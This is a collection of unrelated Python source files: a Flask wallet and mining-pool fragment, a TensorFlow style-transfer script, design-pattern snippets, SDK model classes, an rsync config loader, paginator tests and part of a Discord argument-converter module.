wallets = db.session.query(Wallet).filter(Wallet.user == current_user)
results = []
for wallet in wallets:
valuation = "NOT IMPLEMENTED"
api_row = db.session.query(CurrencyApi).filter(CurrencyApi.currency == wallet.currency).one_or_none()
if api_row:
ApiClass = getattr(currency_api, api_row.classname)
api = ApiClass(api_row.base_url)
balance = api.get_balance(wallet)
rate = rate_util.get_rate(wallet.currency.name)
valuation = "Confirmed: {}{unit} / {:.2f}$ | Unconfirmed {}{unit} / {:.2f}$" \
.format(balance["balance"], balance["balance"]*rate,
balance["unconfirmed"], balance["unconfirmed"]*rate,
unit=wallet.currency.symbol)
results.append("{}, valuation: {}".format(wallet, valuation))
return render_template('list.html',
label="Wallets for {}".format(current_user.login),
elements=results)
@app.route("/balance-summary/<user>/<pool>")
def balance_summary(user, pool):
# TODO: query by user
wallet = db.session.query(Wallet).all()[0]
pool = db.session.query(Pool).filter(Pool.id==pool).one()
poolapi = CryptonoteApi(pool.api_base_url)
return str(poolapi.get_balance(wallet))
@app.route("/dict")
def todict():
instance = db.session.query(Miner).first()
return str(json.dumps(instance.as_dict()))
@app.route("/api/miningoperation/<user>", methods=["POST"])
def mining_operation(user):
device = db.session.query(MiningDevice) \
.filter(MiningDevice.id_on_system == request.form["device_id_on_system"]) \
.filter(MiningDevice.system.name == request.form["system_name"])
operation = db.session.query(MiningOperation).filter(MininingOperation.mining_device == device) \
.one()
return "Mining Op: {}".format(json.dumps(operation))
|
<filename>styleTransfer.py
import tensorflow as tf
import tensorflow.contrib as contrib
import numpy as np
import scipy.io as sio
import scipy.misc as misc
from PIL import Image
def conv(inputs, w, b):
w = tf.constant(w)
b = tf.constant(b)
return tf.nn.conv2d(inputs, w, [1, 1, 1, 1], "SAME") + b
def mapping(img):
return 255.0 * (img - np.min(img)) / (np.max(img) - np.min(img))
class StyleTransfer:
def __init__(self, H=256, W=256, C=3, alpha=1e-3, beta=1.0, iteration=500, content_path="./content//content.jpg", style_path="./style//style.jpg"):
self.content_img = tf.placeholder("float", [1, H, W, C])
self.style_img = tf.placeholder("float", [1, H, W, C])
self.target_img = tf.get_variable("target", shape=[1, H, W, C], initializer=tf.truncated_normal_initializer(stddev=0.02))
feature_bank_x = self.Network_vgg(self.target_img)
feature_bank_style = self.Network_vgg(self.style_img)
feature_bank_content = self.Network_vgg(self.content_img)
self.L_content = self.content_loss(feature_bank_x, feature_bank_content)
self.L_style = self.style_loss(feature_bank_x, feature_bank_style)
self.total_loss = alpha * self.L_content + beta * self.L_style
# self.Opt = tf.train.AdamOptimizer(0.0002).minimize(self.total_loss)
#L-BFGS
self.optimizer = tf.contrib.opt.ScipyOptimizerInterface(self.total_loss, method='L-BFGS-B',options={'maxiter': iteration, 'disp': 0})
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
self.train(H, W, C, content_path, style_path)
def train(self, H, W, C, content_path, style_path):
content_img = np.reshape(misc.imresize(np.array(Image.open(content_path)), [H, W], mode="RGB"), [1, H, W, C])
style_img = np.reshape(misc.imresize(np.array(Image.open(style_path)), [H, W], mode="RGB"), [1, H, W, C])
self.sess.run(tf.assign(self.target_img, content_img), feed_dict={self.content_img: content_img, self.style_img: style_img})
self.optimizer.minimize(self.sess, feed_dict={self.content_img: content_img, self.style_img: style_img})
L_content = self.sess.run(self.L_content, feed_dict={self.content_img: content_img, self.style_img: style_img})
L_style = self.sess.run(self.L_style, feed_dict={self.content_img: content_img, self.style_img: style_img})
L_total = self.sess.run(self.total_loss, feed_dict={self.content_img: content_img, self.style_img: style_img})
print("L_content: %g, L_style: %g, L_total: %g" % (L_content, L_style, L_total))
target_img = self.sess.run(self.target_img,feed_dict={self.content_img: content_img, self.style_img: style_img})
Image.fromarray(np.uint8(mapping(np.reshape(target_img, [H, W, C])))).save("./deepdream/target.jpg")
def content_loss(self, feature_bank_x, feature_bank_content):
#content loss
#squared-error
return tf.reduce_sum(tf.square(feature_bank_x["relu4_2"] - feature_bank_content["relu4_2"])) / 2.0
def style_loss(self, feature_bank_x, feature_bank_style):
#style loss
E = 0
for layer in feature_bank_style.keys():
if layer == "relu1_1" or layer=="relu2_1" or layer=="relu3_1" or layer=="relu4_1" or layer=="relu5_1":
w = 0.2
else:
w = 0
C = int(feature_bank_x[layer].shape[-1])
H = int(feature_bank_x[layer].shape[1])
W = int(feature_bank_x[layer].shape[2])
F = tf.reshape(tf.transpose(feature_bank_x[layer], [0, 3, 1, 2]), shape=[C, -1])
#Gram matrix of x
G_x = tf.matmul(F, tf.transpose(F))
C = int(feature_bank_style[layer].shape[-1])
F = tf.reshape(tf.transpose(feature_bank_style[layer], [0, 3, 1, 2]), shape=[C, -1])
#Gram matrix of style
G_s = tf.matmul(F, tf.transpose(F))
E += w * tf.reduce_sum(tf.square(G_x - G_s)) / (4 * C**2 * H**2 * W**2)
return E
def Network_vgg(self, inputs):
vgg_para = sio.loadmat("./vgg_para//vgg.mat")
layers = vgg_para["layers"]
feature_bank = {}
with tf.variable_scope("vgg"):
for i in range(37):
if layers[0, i][0, 0]["type"] == "conv":
w = layers[0, i][0, 0]["weights"][0, 0]
b = layers[0, i][0, 0]["weights"][0, 1]
with tf.variable_scope(str(i)):
inputs = conv(inputs, w, b)
elif layers[0, i][0, 0]["type"] == "relu":
inputs = tf.nn.relu(inputs)
feature_bank[layers[0, i][0, 0]["name"][0]] = inputs
else:
inputs = tf.nn.max_pool(inputs, [1, 2, 2, 1], [1, 2, 2, 1], "SAME")
return feature_bank
if __name__ == "__main__":
st = StyleTransfer(H=512, W=512, C=3, alpha=1e-5, beta=1.0, iteration=500, content_path="./content//content.jpg", style_path="./style//style.jpg") |
# class User:
# _persist_methods = ['get', 'save', 'delete']
#
# def __init__(self, persister):
# self._persister = persister
#
# def __getattr__(self, attribute):
# if attribute in self._persist_methods:
# return getattr(self._persister, attribute)
#
#
# user = User(persister={'gh': 123})
# print(user.get('gh'))
# class ContentFilter(object):
# def __init__(self, filters=None):
# self._filters = list()
# if filters is not None:
# self._filters += filters
#
# def filter(self, content):
# for filter in self._filters:
# content = filter(content)
# return content
#
#
# content = " lfalksdjfaks l kfasdkflasd laskdfjl offensive_filter"
# filter = ContentFilter([
# 'offensive_filter',
# 'ads_filter',
# 'porno_video_filter'])
# filtered_content = filter.filter(content)
# import os
#
#
# class RenameFileCommand(object):
# def __init__(self, from_name, to_name):
# self._from = from_name
# self._to = to_name
#
# def execute(self):
# os.rename(self._from, self._to)
# print(f'from {self._from} to {self._to}')
#
# def undo(self):
# os.rename(self._to, self._from)
# print(f'from {self._from} to {self._to}')
#
#
# class History(object):
# def __init__(self):
# self._commands = list()
#
# def execute(self, command):
# self._commands.append(command)
# print(self._commands)
# command.execute()
#
# def undo(self):
# self._commands.pop().undo()
# # print(self._commands)
#
#
# history = History()
# history.execute(RenameFileCommand('docs/cv.doc', 'docs/cv-en.doc'))
# history.execute(RenameFileCommand('docs/cv1.doc', 'docs/cv-bg.doc'))
# history.undo()
# history.undo()
#
# class Logger(object):
# def __new__(cls, *args, **kwargs):
# if not hasattr(cls, '_logger'):
# cls._logger = super(Logger, cls).__new__(cls, *args, **kwargs)
# return cls._logger
#
# logger = Logger()
# class Command:
#
# def __init__(self, authenticate=None, authorize=None):
# self.authenticate = authenticate or self._not_authenticated
# self.authorize = authorize or self._not_authorized
#
# def execute(self, user, action):
# self.authenticate(user)
# self.authorize(user, action)
# return action()
#
# if in_sudo_mode:
# command = Command(always_authenticated, always_authorized)
# else:
# command = Command(config.authenticate, config.authorize)
# command.execute(current_user, delete_user_action)
# command = Command()
#
# if in_sudo_mode:
# command.authenticate = always_authenticated
# command.authorize = always_authorized
# else:
# command.authenticate = config.authenticate
# command.authorize = config.authorize
# command.execute(current_user, delete_user_action)
# class Car(object):
#
# def __init__(self):
# self._tyres = [Tyre('front_left'),
# Tyre('front_right'),
# Tyre('rear_left'),
# Tyre('rear_right'), ]
# self._tank = Tank(70)
#
# def tyres_pressure(self):
# return [tyre.pressure for tyre in self._tyres]
#
# def fuel_level(self):
# return self._tank.level
# import socket
#
# class SocketWriter(object):
#
# def __init__(self, ip, port):
# self._socket = socket.socket(socket.AF_INET,
# socket.SOCK_DGRAM)
# self._ip = ip
# self._port = port
#
# def write(self, message):
# self._socket.send(message, (self._ip, self._port))
#
# def log(message, destination):
# destination.write('[{}] - {}'.format(datetime.now(), message))
#
# upd_logger = SocketWriter('1.2.3.4', '9999')
# log('Something happened', udp_destination)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiTradeTicketTicketcodeUseModel(object):
def __init__(self):
self._code_type = None
self._gmt_biz = None
self._order_no = None
self._quantity = None
self._request_id = None
self._shop_id = None
self._shop_type = None
self._ticket_code = None
@property
def code_type(self):
return self._code_type
@code_type.setter
def code_type(self, value):
self._code_type = value
@property
def gmt_biz(self):
return self._gmt_biz
@gmt_biz.setter
def gmt_biz(self, value):
self._gmt_biz = value
@property
def order_no(self):
return self._order_no
@order_no.setter
def order_no(self, value):
self._order_no = value
@property
def quantity(self):
return self._quantity
@quantity.setter
def quantity(self, value):
self._quantity = value
@property
def request_id(self):
return self._request_id
@request_id.setter
def request_id(self, value):
self._request_id = value
@property
def shop_id(self):
return self._shop_id
@shop_id.setter
def shop_id(self, value):
self._shop_id = value
@property
def shop_type(self):
return self._shop_type
@shop_type.setter
def shop_type(self, value):
self._shop_type = value
@property
def ticket_code(self):
return self._ticket_code
@ticket_code.setter
def ticket_code(self, value):
self._ticket_code = value
def to_alipay_dict(self):
params = dict()
if self.code_type:
if hasattr(self.code_type, 'to_alipay_dict'):
params['code_type'] = self.code_type.to_alipay_dict()
else:
params['code_type'] = self.code_type
if self.gmt_biz:
if hasattr(self.gmt_biz, 'to_alipay_dict'):
params['gmt_biz'] = self.gmt_biz.to_alipay_dict()
else:
params['gmt_biz'] = self.gmt_biz
if self.order_no:
if hasattr(self.order_no, 'to_alipay_dict'):
params['order_no'] = self.order_no.to_alipay_dict()
else:
params['order_no'] = self.order_no
if self.quantity:
if hasattr(self.quantity, 'to_alipay_dict'):
params['quantity'] = self.quantity.to_alipay_dict()
else:
params['quantity'] = self.quantity
if self.request_id:
if hasattr(self.request_id, 'to_alipay_dict'):
params['request_id'] = self.request_id.to_alipay_dict()
else:
params['request_id'] = self.request_id
if self.shop_id:
if hasattr(self.shop_id, 'to_alipay_dict'):
params['shop_id'] = self.shop_id.to_alipay_dict()
else:
params['shop_id'] = self.shop_id
if self.shop_type:
if hasattr(self.shop_type, 'to_alipay_dict'):
params['shop_type'] = self.shop_type.to_alipay_dict()
else:
params['shop_type'] = self.shop_type
if self.ticket_code:
if hasattr(self.ticket_code, 'to_alipay_dict'):
params['ticket_code'] = self.ticket_code.to_alipay_dict()
else:
params['ticket_code'] = self.ticket_code
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiTradeTicketTicketcodeUseModel()
if 'code_type' in d:
o.code_type = d['code_type']
if 'gmt_biz' in d:
o.gmt_biz = d['gmt_biz']
if 'order_no' in d:
o.order_no = d['order_no']
if 'quantity' in d:
o.quantity = d['quantity']
if 'request_id' in d:
o.request_id = d['request_id']
if 'shop_id' in d:
o.shop_id = d['shop_id']
if 'shop_type' in d:
o.shop_type = d['shop_type']
if 'ticket_code' in d:
o.ticket_code = d['ticket_code']
return o
|
<gh_stars>0
"""
Configuration for 'treesync' CLI application
"""
from cli_toolkit.configuration import (
ConfigurationSection,
YamlConfiguration
)
from pathlib_tree.tree import SKIPPED_PATHS
from .constants import (
DEFAULT_CONFIGURATION_PATHS,
DEFAULT_EXCLUDES,
DEFAULT_EXCLUDES_FILE,
DEFAULT_FLAGS,
TREE_CONFIG_FILE
)
from .target import Target
class Defaults(ConfigurationSection):
"""
Tree sync default settings
"""
__name__ = 'defaults'
__default_settings__ = {
'rsync_command': 'rsync',
'flags': DEFAULT_FLAGS,
'never_sync_paths': SKIPPED_PATHS,
'excluded_paths': DEFAULT_EXCLUDES,
'tree_config_file': TREE_CONFIG_FILE,
'tree_excludes_file': DEFAULT_EXCLUDES_FILE,
}
class TargetConfiguration(ConfigurationSection):
"""
Loader for named targets in TargetSettings
"""
__default_settings__ = {
'ignore_default_flags': False,
'ignore_default_excludes': False,
'excludes': [],
'excludes_file': None,
'flags': [],
'iconv': None,
}
__required_settings__ = (
'source',
'destination',
)
@property
def destination_server_settings(self):
"""
Return settings for destination server
"""
try:
# pylint: disable=no-member
host, _path = str(self.destination).split(':', 1)
except ValueError:
return None
# pylint: disable=no-member
return getattr(self.__config_root__.servers, host, None)
@property
def destination_server_flags(self):
"""
Return flags specific to destination server
"""
flags = []
settings = self.destination_server_settings
if settings is not None:
iconv = settings.get('iconv', None)
if iconv is not None:
flags.append(f'--iconv={iconv}')
rsync_path = settings.get('rsync_path', None)
if rsync_path is not None:
flags.append(f'--rsync-path={rsync_path}')
return flags
class ServerSettings(ConfigurationSection):
"""
Server specific common sync settings by server name
Since server names can contain letters that are not valid python identifiers
this category is handled as special case unlike normal ConfigurationSection
"""
__name__ = 'servers'
def __getattribute__(self, attr):
"""
Return server by name
"""
try:
settings = super().__getattribute__('__server_settings__')
if attr in settings:
return settings[attr]
except AttributeError:
pass
return super().__getattribute__(attr)
def __load_dictionary__(self, data):
"""
Load server flag data from dictionary. Keys in dictionary are not required
to be valid python identifiers
"""
self.__server_settings__ = {}
for server, settings in data.items():
# Ensure [] and None are cast to empty settings
if not settings:
settings = {}
self.__server_settings__[server] = settings
class TargetSettings(ConfigurationSection):
"""
Tree sync targets by name
"""
__name__ = 'targets'
__dict_loader_class__ = TargetConfiguration
@property
def names(self):
"""
Get configured target names
"""
names = []
for attr in vars(self):
section = getattr(self, attr)
if isinstance(section, Configuration):
continue
if isinstance(section, self.__dict_loader_class__):
names.append(attr)
return names
def __iter__(self):
targets = [getattr(self, name) for name in self.names]
return iter(targets)
def get_target(self, name):
"""
Get target by name
"""
settings = getattr(self, name, None)
if settings is None:
raise ValueError(f'Invalid target name {name}')
return Target(name, settings)
class Configuration(YamlConfiguration):
"""
Yaml configuration file for 'treesync' CLI
"""
__default_paths__ = DEFAULT_CONFIGURATION_PATHS
__section_loaders__ = (
Defaults,
ServerSettings,
TargetSettings,
)
def __repr__(self):
return 'treesync config'
@property
def sync_targets(self):
"""
Get configured sync targets
"""
targets = []
# pylint: disable=no-member
for name in self.targets.names:
targets.append(self.get_target(name))
return targets
def get_target(self, name):
"""
Get target by name
"""
# pylint: disable=no-member
return self.targets.get_target(name)
|
<gh_stars>0
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ComputePerformanceSummary(object):
"""
Parameters detailing the compute performance for a specified DB system shape.
"""
def __init__(self, **kwargs):
"""
Initializes a new ComputePerformanceSummary object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param cpu_core_count:
The value to assign to the cpu_core_count property of this ComputePerformanceSummary.
:type cpu_core_count: int
:param memory_in_gbs:
The value to assign to the memory_in_gbs property of this ComputePerformanceSummary.
:type memory_in_gbs: float
:param network_bandwidth_in_gbps:
The value to assign to the network_bandwidth_in_gbps property of this ComputePerformanceSummary.
:type network_bandwidth_in_gbps: float
:param network_iops:
The value to assign to the network_iops property of this ComputePerformanceSummary.
:type network_iops: float
:param network_throughput_in_mbps:
The value to assign to the network_throughput_in_mbps property of this ComputePerformanceSummary.
:type network_throughput_in_mbps: float
"""
self.swagger_types = {
'cpu_core_count': 'int',
'memory_in_gbs': 'float',
'network_bandwidth_in_gbps': 'float',
'network_iops': 'float',
'network_throughput_in_mbps': 'float'
}
self.attribute_map = {
'cpu_core_count': 'cpuCoreCount',
'memory_in_gbs': 'memoryInGBs',
'network_bandwidth_in_gbps': 'networkBandwidthInGbps',
'network_iops': 'networkIops',
'network_throughput_in_mbps': 'networkThroughputInMbps'
}
self._cpu_core_count = None
self._memory_in_gbs = None
self._network_bandwidth_in_gbps = None
self._network_iops = None
self._network_throughput_in_mbps = None
@property
def cpu_core_count(self):
"""
**[Required]** Gets the cpu_core_count of this ComputePerformanceSummary.
The number of OCPU cores available.
:return: The cpu_core_count of this ComputePerformanceSummary.
:rtype: int
"""
return self._cpu_core_count
@cpu_core_count.setter
def cpu_core_count(self, cpu_core_count):
"""
Sets the cpu_core_count of this ComputePerformanceSummary.
The number of OCPU cores available.
:param cpu_core_count: The cpu_core_count of this ComputePerformanceSummary.
:type: int
"""
self._cpu_core_count = cpu_core_count
@property
def memory_in_gbs(self):
"""
**[Required]** Gets the memory_in_gbs of this ComputePerformanceSummary.
The amount of memory allocated for the VMDB System.
:return: The memory_in_gbs of this ComputePerformanceSummary.
:rtype: float
"""
return self._memory_in_gbs
@memory_in_gbs.setter
def memory_in_gbs(self, memory_in_gbs):
"""
Sets the memory_in_gbs of this ComputePerformanceSummary.
The amount of memory allocated for the VMDB System.
:param memory_in_gbs: The memory_in_gbs of this ComputePerformanceSummary.
:type: float
"""
self._memory_in_gbs = memory_in_gbs
@property
def network_bandwidth_in_gbps(self):
"""
**[Required]** Gets the network_bandwidth_in_gbps of this ComputePerformanceSummary.
The network bandwidth of the VMDB system in gbps.
:return: The network_bandwidth_in_gbps of this ComputePerformanceSummary.
:rtype: float
"""
return self._network_bandwidth_in_gbps
@network_bandwidth_in_gbps.setter
def network_bandwidth_in_gbps(self, network_bandwidth_in_gbps):
"""
Sets the network_bandwidth_in_gbps of this ComputePerformanceSummary.
The network bandwidth of the VMDB system in gbps.
:param network_bandwidth_in_gbps: The network_bandwidth_in_gbps of this ComputePerformanceSummary.
:type: float
"""
self._network_bandwidth_in_gbps = network_bandwidth_in_gbps
@property
def network_iops(self):
"""
**[Required]** Gets the network_iops of this ComputePerformanceSummary.
IOPS for the VMDB System.
:return: The network_iops of this ComputePerformanceSummary.
:rtype: float
"""
return self._network_iops
@network_iops.setter
def network_iops(self, network_iops):
"""
Sets the network_iops of this ComputePerformanceSummary.
IOPS for the VMDB System.
:param network_iops: The network_iops of this ComputePerformanceSummary.
:type: float
"""
self._network_iops = network_iops
@property
def network_throughput_in_mbps(self):
"""
**[Required]** Gets the network_throughput_in_mbps of this ComputePerformanceSummary.
Network throughput for the VMDB System.
:return: The network_throughput_in_mbps of this ComputePerformanceSummary.
:rtype: float
"""
return self._network_throughput_in_mbps
@network_throughput_in_mbps.setter
def network_throughput_in_mbps(self, network_throughput_in_mbps):
"""
Sets the network_throughput_in_mbps of this ComputePerformanceSummary.
Network throughput for the VMDB System.
:param network_throughput_in_mbps: The network_throughput_in_mbps of this ComputePerformanceSummary.
:type: float
"""
self._network_throughput_in_mbps = network_throughput_in_mbps
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
<filename>tests/helpers/test_paginator.py
""" Tests for the Paginator
"""
import pytest
from unittest.mock import Mock, call
from styler_rest_framework.helpers.paginator import \
Paginator, InvalidParameterError
class TestInit:
""" Tests for constructor
"""
def test_init_a_paginator(self):
pag = Paginator(limit=10, page=1)
assert isinstance(pag, Paginator)
def test_init_a_paginator_with_none(self):
pag = Paginator(limit=None, page=None)
assert isinstance(pag, Paginator)
assert pag._current == 1
assert pag._limit == 20
def test_invalid_limit(self):
with pytest.raises(InvalidParameterError) as expected:
Paginator(limit=-1, page=1)
assert str(expected.value) == 'Invalid limit'
def test_invalid_limit_type(self):
with pytest.raises(InvalidParameterError) as expected:
Paginator(limit='aaa', page=1)
assert str(expected.value) == 'Invalid limit'
def test_invalid_page(self):
with pytest.raises(InvalidParameterError) as expected:
Paginator(limit=10, page=-1)
assert str(expected.value) == 'Invalid page'
def test_invalid_page_type(self):
with pytest.raises(InvalidParameterError) as expected:
Paginator(limit=10, page='aaa')
assert str(expected.value) == 'Invalid page'
class TestGetPage:
    """Behaviour of Paginator.get_page."""

    @staticmethod
    def _query_stub(total):
        # Chainable SQLAlchemy-style query mock: offset()/limit() return the query itself.
        query = Mock()
        query.count.return_value = total
        query.offset.return_value = query
        query.limit.return_value = query
        query.all.return_value = [1, 2, 3]
        return query

    def test_normal_flow(self):
        """Returns the page of items and applies the expected offset/limit."""
        query = self._query_stub(100)
        paginator = Paginator(limit=10, page=1)
        assert paginator.get_page(query) == [1, 2, 3]
        assert query.count.call_count == 1
        assert call(0) in query.offset.mock_calls
        assert call(10) in query.limit.mock_calls

    def test_invalid_page(self):
        """Raises without querying when the requested page is past the end."""
        query = self._query_stub(5)
        paginator = Paginator(limit=10, page=2)
        with pytest.raises(InvalidParameterError) as exc_info:
            paginator.get_page(query)
        assert str(exc_info.value) == 'Invalid page'
        assert query.count.call_count == 1
        assert query.offset.call_count == 0
        assert query.limit.call_count == 0
class TestGetInfo:
    """Behaviour of Paginator.get_info."""

    @staticmethod
    def _query_stub(total=100):
        # Chainable query mock: offset()/limit() return the query itself.
        query = Mock()
        query.count.return_value = total
        query.offset.return_value = query
        query.limit.return_value = query
        query.all.return_value = [1, 2, 3]
        return query

    @staticmethod
    def _info_for(page):
        # Page through a 100-item result at 10 per page, then read the info dict.
        paginator = Paginator(limit=10, page=page)
        paginator.get_page(TestGetInfo._query_stub())
        return paginator.get_info()

    def test_get_info(self):
        info = self._info_for(3)
        assert info['total_pages'] == 10
        assert info['total_number_of_items'] == 100
        assert info['current_page'] == 3
        assert info['previous_page'] == 2
        assert info['next_page'] == 4

    def test_none_previous_page(self):
        """previous_page is None on the first page."""
        info = self._info_for(1)
        assert info['total_pages'] == 10
        assert info['total_number_of_items'] == 100
        assert info['current_page'] == 1
        assert info['previous_page'] is None
        assert info['next_page'] == 2

    def test_none_next_page(self):
        """next_page is None on the last page."""
        info = self._info_for(10)
        assert info['total_pages'] == 10
        assert info['total_number_of_items'] == 100
        assert info['current_page'] == 10
        assert info['previous_page'] == 9
        assert info['next_page'] is None
|
<filename>tanjun/conversion.py<gh_stars>0
# -*- coding: utf-8 -*-
# cython: language_level=3
# BSD 3-Clause License
#
# Copyright (c) 2020-2021, Faster Speeding
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import annotations
__all__: list[str] = [
"ArgumentT",
"BaseConverter",
"ChannelConverter",
"ColorConverter",
"EmojiConverter",
"GuildConverter",
"InviteConverter",
"MemberConverter",
"PresenceConverter",
"RoleConverter",
"SnowflakeConverter",
"UserConverter",
"VoiceStateConverter",
"to_channel",
"to_color",
"to_colour",
"to_emoji",
"to_guild",
"to_invite",
"to_invite_with_metadata",
"to_member",
"to_presence",
"to_role",
"to_snowflake",
"to_user",
"to_voice_state",
]
import abc
import datetime
import distutils.util
import operator
import re
import typing
import urllib.parse
import warnings
import hikari
from . import errors
if typing.TYPE_CHECKING:
from collections import abc as collections
from . import abc as tanjun_abc
from . import parsing
# Raw command argument type as received from the parser.
ArgumentT = typing.Union[str, int, float]
# Generic result type produced by a converter.
_ValueT = typing.TypeVar("_ValueT")
class BaseConverter(typing.Generic[_ValueT], abc.ABC):
    """Abstract base for argument converters which resolve raw input to a ``_ValueT``."""

    __slots__ = ()

    # Shared registry of converter instances, populated at module import time by
    # the loop at the bottom of this module. Name-mangled to
    # _BaseConverter__implementations, so all subclasses see the same set.
    __implementations: set[BaseConverter[typing.Any]] = set()

    async def __call__(self, argument: ArgumentT, ctx: tanjun_abc.Context) -> _ValueT:
        # Lets a converter instance be used directly as a conversion callback.
        return await self.convert(ctx, argument)

    def bind_client(self, client: tanjun_abc.Client, /) -> None:
        """Warn at bind time if this converter cannot work with the given client.

        Emits a ``StateWarning`` when the converter needs a cache but the client
        is stateless, or when the declared shard intents don't cover what the
        converter requires.
        """
        cache_bound = self.cache_bound
        if cache_bound and not client.cache:
            warnings.warn(
                f"Registered converter {self!r} will always fail with a stateless client.",
                category=errors.StateWarning,
            )
            # No point checking intents on a cacheless client.
            return

        if cache_bound and client.shards:  # TODO: alternative message when not state bound and wrong intents
            required_intents = self.intents
            # All required intent bits must be present in the shards' intents.
            if (required_intents & client.shards.intents) != required_intents:
                warnings.warn(
                    f"Registered converter {type(self).__name__!r} will not run as expected "
                    f"when {required_intents!r} intent(s) are not declared",
                    category=errors.StateWarning,
                )

    def bind_component(self, _: tanjun_abc.Component, /) -> None:
        # No component-level state; hook kept for interface symmetry.
        pass

    @classmethod
    def get_from_type(cls, type_: type[_ValueT], /) -> typing.Optional[BaseConverter[_ValueT]]:
        """Return the registered converter for ``type_``, or None.

        Inheritable converters match subclasses of their declared types;
        non-inheritable converters require an exact type match.
        """
        for converter in cls.__implementations:
            is_inheritable = converter.is_inheritable()
            if is_inheritable and issubclass(type_, converter.types()):
                return converter

            if not is_inheritable and type_ in converter.types():
                return converter

        return None

    @classmethod
    def implementations(cls) -> collections.MutableSet[BaseConverter[typing.Any]]:
        """Return the (mutable) registry of known converter instances."""
        return cls.__implementations

    @property
    @abc.abstractmethod
    def cache_bound(self) -> bool:  # TODO: replace with cache components
        """Whether this converter relies on the client's cache."""
        raise NotImplementedError

    @abc.abstractmethod
    async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> _ValueT:
        """Convert ``argument``; implementations raise ValueError when it cannot be resolved."""
        raise NotImplementedError

    @property
    @abc.abstractmethod
    def intents(self) -> hikari.Intents:
        """Gateway intents this converter needs to see its data."""
        raise NotImplementedError

    @classmethod
    @abc.abstractmethod
    def is_inheritable(cls) -> bool:  # TODO: will this ever actually work when true?
        """Whether this converter should also match subclasses of its declared types."""
        raise NotImplementedError  # or do we want to assert specific idk channel types

    @classmethod
    @abc.abstractmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        """The type(s) this converter handles, as used by ``get_from_type``."""
        raise NotImplementedError
class ChannelConverter(BaseConverter[hikari.PartialChannel]):
    """Resolve a channel mention or ID to a `hikari.PartialChannel`."""

    __slots__ = ()

    @property
    def cache_bound(self) -> bool:
        return True

    async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.PartialChannel:
        """Check the cache first, then fall back to a REST fetch."""
        channel_id = parse_channel_id(argument, message="No valid channel mention or ID found")
        cache = ctx.client.cache
        if cache:
            cached = cache.get_guild_channel(channel_id)
            if cached:
                return cached

        try:
            return await ctx.rest.fetch_channel(channel_id)

        except hikari.NotFoundError:
            raise ValueError("Couldn't find channel") from None

    @property
    def intents(self) -> hikari.Intents:
        return hikari.Intents.GUILDS

    @classmethod
    def is_inheritable(cls) -> bool:
        # Also matches PartialChannel subclasses (text, voice, ...).
        return True

    @classmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        return (hikari.PartialChannel,)
class ColorConverter(BaseConverter[hikari.Color]):
    """Convert raw input into a `hikari.Color`."""

    __slots__ = ()

    @property
    def cache_bound(self) -> bool:
        # Pure value parsing; no cache access.
        return False

    async def convert(self, _: tanjun_abc.Context, argument: ArgumentT, /) -> typing.Any:
        """Build a colour from an int/float or a space-separated string of components."""
        if not isinstance(argument, str):
            return hikari.Color.of(argument)

        parts = argument.split(" ")
        if all(part.isdigit() for part in parts):
            # All-numeric components are converted to ints (e.g. "255 0 0").
            return hikari.Color.of(*(int(part) for part in parts))

        return hikari.Color.of(*parts)

    @property
    def intents(self) -> hikari.Intents:
        return hikari.Intents.NONE

    @classmethod
    def is_inheritable(cls) -> bool:
        return False

    @classmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        return (hikari.Color,)
class EmojiConverter(BaseConverter[hikari.KnownCustomEmoji]):
    """Resolve a custom emoji mention or ID to a `hikari.KnownCustomEmoji`."""

    __slots__ = ()

    @property
    def cache_bound(self) -> bool:
        return True

    async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.KnownCustomEmoji:
        """Try the cache, then a guild-scoped REST fetch."""
        emoji_id = parse_emoji_id(argument, message="No valid emoji or emoji ID found")
        cache = ctx.client.cache
        if cache:
            cached = cache.get_emoji(emoji_id)
            if cached:
                return cached

